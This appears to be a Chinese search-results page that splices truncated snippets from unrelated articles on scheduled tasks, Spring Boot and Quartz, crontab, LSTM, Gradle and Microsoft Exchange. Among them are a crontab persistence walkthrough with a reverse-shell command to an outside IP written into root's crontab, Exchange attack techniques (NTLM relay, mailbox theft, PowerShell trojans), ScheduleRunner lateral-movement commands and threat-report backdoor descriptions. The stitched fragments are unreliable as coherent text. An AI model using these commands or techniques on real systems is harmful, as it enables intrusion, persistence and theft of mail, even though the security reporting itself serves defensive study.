开篇 这篇只介绍怎么用,不说原理;先说一种常用的定时任务的方法;使用schedule定时任务最常用的是使用Springboot自带schedule;使用springboot自带的schedule实现定时任务...,不用引用任何第三方的工具包,只需要:在启动类上增加@EnableScheduling注解,即可开启定时任务的支持;定义自己的定时任务业务逻辑类 加上注解@Component或@Configuration...,在定时任务的具体逻辑方法加上注解@Schedule("${cron表达式}")使用Quratz:Quartz 是一个完全由 Java 编写的开源作业调度框架,为在 Java 应用程序中进行作业调度提供了简单却强大的机制...创建springboot工程: 在IDEA中基于springboot 2.7....JobConfiguration,注意添加注解Configuration;在JobConfiguration中添加两个BeanJobDetail 表示一个具体的可执行的调度程序,Job 是这个可执行程调度程序所要执行的内容
Linux中的计划任务可以让系统周期性地运行所指定的程序或命令,攻击者可以利用这个特性让系统周期性运行恶意程序或者命令。计划任务具体使用方法参考前文,这里只讲述攻击者如何利用该技术进行权限维持。...首先,使用命令service cron status来检查系统中的计划任务服务是否正常运行,执行结果如图1-1所示,running则代表正在运行。...然后,使用命令crontab -l来查看当前用户在系统中创建的计划任务,执行结果如图1-2所示。...那么攻击者可以执行命令echo "*/1 * * * * bash -i >& /dev/tcp/192.168.31.111/10029 0>&1" > /var/spool/cron/crontabs/root,在计划任务中写入一个每分钟建立回连会话的语句...那么,攻击者可以利用这个特性,写入一个无法被crontab -l获取的计划任务。
入列微任务 就其本身而言,应该使用微任务的典型情况,要么只有在没有其他办法的时候,要么是当创建框架或库时需要使用微任务达成其功能。...通过引入 queueMicrotask(),由晦涩地使用 promise 去创建微任务而带来的风险就可以被避免了。...举例来说,当使用 promise 创建微任务时,由回调抛出的异常被报告为 rejected promises 而不是标准异常。...何时使用微服务 在本章节中,我们来看看微服务特别有用的场景。...下面的代码片段创建了一个函数,将多个消息放入一个数组中批处理,通过一个微任务在上下文退出时将这些消息作为单一的对象发送出去。
创建springboot工程集成Quratz: 在IDEA中基于springboot 2.7....*创建工程,集成Quratz,勾选I/O下Quratz Scheduler即可;图片创建完成后的pom.xml中Quratz的依赖是 org.springframework.boot...} list.add(map); } } return list; }修改指定的Job定时任务触发信息....build(); scheduler.rescheduleJob(triggerKey,trigger); return "ok"; }实现逻辑: 在以上代码中...,接口服务中的Scheduler是可以直接依赖注入的;不需要额外指定Bean;但在之前版本的Quratz中是需要的;获取所有job的逻辑是:使用GroupMatcher匹配获取所有的jobKey;主要使用
(); taskScheduler.setPoolSize(50); return taskScheduler; } 如果没有指定TaskScheduler则会创建一个单线程的默认调度器...因此问题就清楚了,需要自己创建一个TaskScheduler。
在Onedrive for Business(以下简称ODB)中创建一个文件是非常轻松的一件事: 选择想要的路径,设置文件名,选择文件内容(文件内容大部分时候都是来自于其他action,比如邮件附件或者...forms附件等,这里为了简化流程,随便写了一个): 点击运行,就可以在文件夹中找到这个文件: 但是,如果我们想要创建一个文件夹呢?...比如我们在文件夹路径的后边继续输入“/测试生成路径”: 结果它也照样生成了这个文件,并且还为我们创建了一个新的文件夹: 答案呼之欲出了: 我们将这个a.txt文件删掉,不就达到了创建一个空文件夹的目的了吗...添加一个ODB的删除文件,选择上一步生成文件的ID: 在ODB中查看,果然生成了一个空文件夹。 我们再看一眼所需的时间,只需要14ms,根本忽略不计。...结论: Power Automate flow虽然并没有给我们提供一个单独的action来实现在ODB中创建空白文件夹,但是我们通过一点小技巧就可以巧妙的实现。
中快速实现情感分析任务。...为什么 RNN 在实际中并不会成功? 在训练 RNN 的过程中,信息在循环中一次又一次的传递会导致神经网络模型的权重发生很大的更新。...tanh 层从新输入中创建一个新向量,向量的值是所有可能的值。然后这两个值相乘来更新新的 cell 状态。然后这个新记忆和旧的记忆 c(t-1) 加起来得到 c(t)。...在 LSTM 中,我们的模型学会了在长期记忆中保存哪些信息,丢掉哪些信息。...使用 LSTM 进行情感分析的快速实现 这里,我在 Yelp 开放数据集(https://www.yelp.com/dataset)上使用 Keras 和 LSTM 执行情感分析任务。
Crontab 介绍 当你需要在Linux系统中定时执行任务时,crontab是一个强大的工具。它允许你按照指定的时间表自动运行命令、脚本和任务。...字段的含义如下: 分钟(0-59):表示一小时内的哪一分钟执行任务。 小时(0-23):表示一天内的哪个小时执行任务。 日期(1-31):表示一个月内的哪一天执行任务。...月份(1-12):表示一年中的哪个月执行任务。 星期几(0-7,其中0和7都表示星期天):表示一周中的哪一天执行任务。 字段还可以包含特殊字符: *:表示匹配所有可能的值。...在分钟字段中,*/2表示每2分钟一次。 Crontab 基本用法 要编辑你的用户crontab,可以运行以下命令: crontab -e 然后,你可以在编辑器中添加你的计划任务。...your/command 这些示例展示了如何使用crontab的字段和特殊字符来创建更复杂和精确的定时任务。
2013及以上 对于 Exchange 2013及更高版本,无法使用查看文件夹的方式直接导出全部通讯录,但是可以使用FindPeople操作实现。...该工具实现了将获取到的 Net-NTLM 哈希重放到真实 Exchange 服务器的 EWS 接口进行认证,通过 EWS 获取用户邮箱的邮件信息、附件下载、创建转发规则、查询GAL等。...2、域内提权 由于 Exchange 本身机制问题,在内网中,使用 CVE-2018-8581 漏洞,将管理员的 NTLM hash 中继到域控服务器上,就可以获得域管权限,实现域内提权。...首先在目标用户文件夹添加指定用户权限。 在指定用户文件夹下添加共享文件用户。 2、邮箱管理员 在 ecp 中也可以实现添加邮箱管理员权限。...Outlook 收件箱主页指向的 URL 在 Outlook 中通过 iframe 标签加载,其执行 wscript 或 vbscript 受沙箱环境限制,无法使用脚本代码创建敏感的恶意对象,即无法直接通过
,使用起来非常方便,这个框架也是我在搜索iis预加载的时候偶然间发现的,立马拿来试用一下,感觉爽呆了,当然还有Quarz.Net之类的其他任务管理框架,不过看配置似乎有点麻烦,反正除了timer我啥也没用过...,如果不在web项目中运行,则不需要实现IRegisteredObject接口以及stop函数,所有的业务代码均在Execute函数中执行 在ASP.NET中作定时任务 在之前我们也有部分项目用widowsservice...来做定时任务,但是弊端很明显,调试太麻烦,发布也麻烦,自动发布更难实现 相比之下web服务器就容易管理的多了 实际上在asp.net 中的定时任务和FluentScheduler框架并没有什么必然的联系...,你也可以用timer或其他的任何方式来实现,但是所有的这些实现方式都避免不了面对一个问题:IIS的回收机制 因为有了回收机制的存在,所以在asp.net中做定时任务就会面临两个问题: 1.任务没有执行完成线程就被回收了...2.线程回收之后,只有在下一次访问网站的时候任务才会再次启动 首先我们来解决第一个问题: 对于iis的回收,我们需要做的其实并不是阻止它的回收,实际上我试过各种方式都无法完全阻挡iis的回收,不知道是否是方法没有用对
在Exchange中管理员可以创建不同的地址列表,用于方便管理维护组织,也方便邮箱用户通过地址列表查找特定的联系人邮箱,Exchange默认会创建一些内置的地址列表,其中包含了一个Default Global...通过结合Empire、共享文件夹、ruler,对该功能进行利用。 使用Empire启用一个监听器,创建一句话的powershell木马。...Outlook收件箱主页指向的URL在Outlook中通过iframe标签加载,其执行wscript或vbscript受沙箱环境限制,无法使用脚本代码创建敏感的恶意对象,即无法直接通过CreateObject...,并通过角色委派通过EWS服务接口逐一检索各个邮箱账户,任务结束后,ApplicationImpersonation角色分配也被删除。...3.获取组织内的所有邮箱用户列表 利用已掌握的合法邮箱凭证,可以利用OWA或者EWS接口查询获取到Exchange组织中所有的邮箱用户的邮件地址,即全局地址列表。
通过 Exchange 连接破坏组织的域可能成为一项微不足道的任务,尤其是在缺少许多安全控制的情况下。...: Outlook Web 访问 (OWA) 交换网络服务 (EWS) Exchange ActiveSync (EAS) 所有这些服务都创建了一个攻击面,威胁参与者可以通过进行可能导致发现合法凭据、访问用户邮箱和执行域升级的攻击而受益...Get-Mailbox | Set-CASMailbox -EwsEnabled $false 威胁参与者将无法通过 Exchange 进行身份验证以发送 API 调用,他们将在其终端中收到以下错误...Benjamin Delpy在 Twitter 上提出了一种通过将MaxSubscriptions设置为零来缓解漏洞的替代方法。此设置将阻止 Exchange 发送任何 EWS 通知。...在浏览邮箱文件夹或重新启动 Microsoft Outlook 时将触发有效负载。该技术的发现属于Etienne Stallans,并且该攻击的实施需要用户凭据。
该特性在exchange server 2013中默认开启,也就是说在exchange server 2013 以后outlook 不再区分内外网环境。...在渗透中可以通过GAL来获取所有邮箱地址。 EXCHANGE信息搜集 在渗透中该如何发现哪一台机器是EXCHANGE服务器呢?...Server 2007开始推出的一项自动服务,用于自动配置用户在Outlook中邮箱的相关设置,简化用户登陆使用邮箱的流程。.../ecp/“Exchange Control Panel” Exchange管理中心,管理员用于管理组织中的Exchange的Web控制台 /eWS/“Exchange Web Services”...点击此处的权限,来到以下界面,这里的默认即 所有用户(everyone) 的对此文件夹的权限,我这里是把权限给的很高 实战中也可能会遇到用户A对用户B的收件箱有读写权限的情况,所以我们在获取用户A的凭据后可以进而读取用户
关于ScheduleRunner 通过“计划任务”来实现渗透测试是过去十年中最流行的技术之一,而且该技术也是目前网络安全研究人员在实现持久化和横向移动时说普遍使用的。...ScheduleRunner同样也是一款基于C#开发的安全测试工具,该工具提供了高度定制化开发支持,灵活性也非常高,可以在渗透测试活动中帮助广大研究人员通过“计划任务”来实现持久化和横向移动任务。...查询所有子文件夹中的计划任务 move 使用计划任务(自动创建、运行和删除)执行横向移动 工具下载 广大研究人员可以使用下列命令将该项目源码克隆至本地: git clone https://github.com...:queryfolders 使用指定的用户账号在远程服务器中通过计划任务执行横向移动: ScheduleRunner.exe /method:move /taskname:Demo /remoteserver...”的计划任务: ScheduleRunner.exe /method:delete /taskname:Cleanup /technique:hide 隐藏计划任务 这项技术是HAFNIUM团队一直在使用的
经过仔细测试,我们确认这些系统正在使用这个 0-day 漏洞进行攻击。为了帮助社区在微软官方补丁发布之前暂时阻止攻击,我们发布这篇文章针对那些使用微软 Exchange 电子邮件系统的组织。...后利用 在成功掌握漏洞利用后,我们记录了攻击以收集信息并在受害者的系统中建立立足点。攻击团队还使用各种技术在受影响的系统上创建后门,并对系统中的其他服务器进行横向移动。...之后,攻击者使用rar.exe压缩转储文件并将其复制到 Exchange 服务器的 webroot 中。不幸的是,在响应过程中,上述文件在被入侵的系统上不再存在,可能是由于黑客删除了证据。...具体来说: Run类创建一个侦听器,用于侦听路径 https://*:443/ews/web/webconfig/ 上的端口 443 的连接。 监听后,恶意软件会创建一个调用r的新线程。...o 案例4:调用wf方法,负责写文件 o 案例5:调用方法rf,负责读取文件 o 案例 6:创建文件夹 o 案例 7:删除文件或文件夹 o 案例 8:移动文件 o 案例 9:为文件设置时间 o 案例
我们需要网站生成sitemap.xml,有些搜索引擎只支持.xml,不支持.txt,所以我们必须在511遇见论坛下自动生成sitemap.xml,由于我们采用了伪静态,所以生成的链接必须和伪静态规则一致,在discuz...后台插件搜索了几个,姑且不谈收费免费,发现很不稳定,且静态规则无法兼容,这里我们采用discuz的定时任务,自动生成sitemap.xml。...把cron_sitemap.php文件上传到论坛目录把cron_sitemap.php上传至source\include\cron目录discuz后台添加定时任务后台–工具–计划任务–新增,名字随便,提交然后编辑...,任务脚本:cron_sitemap.php对于任务的设置,大家可以参考我的:
虽然我们无法确认攻击者是如何入侵这台Exchange服务器的,但是根据此次事件相关的计划任务创建时间戳,我们发现攻击者早在2019年8月22日之前就已经能够访问这台Exchange服务器了。...TriFive后门使用的是一个基于电子邮件的信道,这个信道可以使用Exchange Web服务(EWS)在被入侵的电子邮件帐号的已删除邮件夹中创建邮件草稿。...我们现在还无法确定攻击者是否使用了这些PowerShell脚本中的任何一个来安装webshell,但是我们相信攻击者在日志记录事件之前就已经访问过这台Exchange服务器了。...\Windows\WDI文件夹中创建的。...我们现在还无法确认攻击者是如何创建ResolutionHosts和ResolutionHosts任务的。
在每一个 UNC3524 受害者环境中,攻击者都会针对一个子集的邮箱,集中其注意力在执行团队和从事企业发展、兼并和收购的员工或 IT 安全人员身上。...Exchange Online 环境提出 Exchange 网络服务(EWS)API 请求。...在一些攻击中,UNC3524 也会在 DMZ 网络服务器上部署 reGeorg 网络外壳(注:该版本与俄罗斯赞助的 APT28/Fancy Bear 组织有关联),以创建一个SOCKS 隧道作为进入受害者网络的替代接入点...在获得访问权并部署其后门后,UNC3524 获得了受害者邮件环境的特权凭证,并开始通过 Exchange 网络服务(EWS)API请求,瞄准企业内部的Microsoft Exchange或Microsoft...365 Exchange Online邮箱。
extensionFun : ' + str } } 在自定义插件中 , 关联该扩展 : // 创建一个扩展 // 类似于 Android Gradle 插件中的...Gradle 任务 Task ---- 在 Android Studio 的 Gradle 面板中的 Task 任务 , 都是在 Android Gradle 插件中定义的 , 在自定义插件中 , 也可以自定义...{ @TaskAction void run() { println 'MyTask TaskAction' } } 然后 , 在自定义插件中 , 创建 Task...// 类似于 Android Gradle 插件中的 android // 引入了 MyPlugin 插件后 // 就可以使用 myplugin 配置块...构建脚本中引入插件 ; apply plugin: MyPlugin 编译应用 , 可以看到 HelloMyTask 任务在 preBuild 之后 , 在 preDebugBuild 之前执行 ;
摘要 自从Fast RCNN以来,物体检测中的分类和回归都是共享的一个head,但是,分类和回归实际上是两个不一样的任务,在空间中所关注的内容也是不一样的,所以,共享一个检测头会对性能有伤害。...TSD在原来的proposal的基础上,生成了两个解耦的proposal,分别用于分类和回归任务。...这个改动在使用原来的backbone的基础上提升了3个点,更进一步,我们提出了progressive constraint (PC)来增大TSD和原始的head之间的margin,这又带来1个点的提升。...我们的目的是在空间维度对不同的任务进行解耦,在TSD中,上面的式子可以写成: ? 其中,Pc和Pr是从同一个P中预测得到的。...在使用不规则的ROI Pc来生成特征图的时候,我们还可以使用deformable RoI pooling来实现: ?
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
腾讯会议
云直播
